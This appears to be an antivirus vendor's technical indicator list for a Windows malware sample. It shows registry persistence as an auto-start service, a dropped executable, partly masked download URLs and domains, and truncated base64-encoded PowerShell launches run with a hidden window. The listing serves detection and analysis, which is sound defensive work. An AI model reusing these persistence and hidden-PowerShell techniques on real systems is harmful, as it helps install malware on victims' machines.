Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\createarestore] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\createarestore] 'ImagePath' = '"%WINDIR%\SysWOW64\createarestore.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAHEAbgBkAHMAdQBhAHIAZAB6AD0AJwBUAHgAdwBoAGgAbAB1AHAAbQB1AG8AYQAnADsAJABCAGgAYgBiAGkAYgB6AG4AYwBnAGwAcQAgAD0AIAAnADgAMAA1ACcAOwAkAE8AYgBrAGcAYQBvAHQAeABvAGoAbABiAHUAPQAnAEQAYwB4AG8AaQBiAH...
- %HOMEPATH%\805.exe
- %HOMEPATH%\805.exe
- %HOMEPATH%\805.exe в %WINDIR%\syswow64\createarestore.exe
- %HOMEPATH%\805.exe
- http://nv#.##tsmartz.net/zod/gedkhogBs/
- http://85.##0.115.92/EctBG5xZAXkOj
- DNS ASK 9j###iss.com
- DNS ASK nv#.##tsmartz.net
- DNS ASK tb########rakat.000webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAHEAbgBkAHMAdQBhAHIAZAB6AD0AJwBUAHgAdwBoAGgAbAB1AHAAbQB1AG8AYQAnADsAJABCAGgAYgBiAGkAYgB6AG4AYwBnAGwAcQAgAD0AIAAnADgAMAA1ACcAOwAkAE8AYgBrAGcAYQBvAHQAeABvAGoAbABiAHUAPQAnAEQAYwB4AG8AaQBiAH...' (со скрытым окном)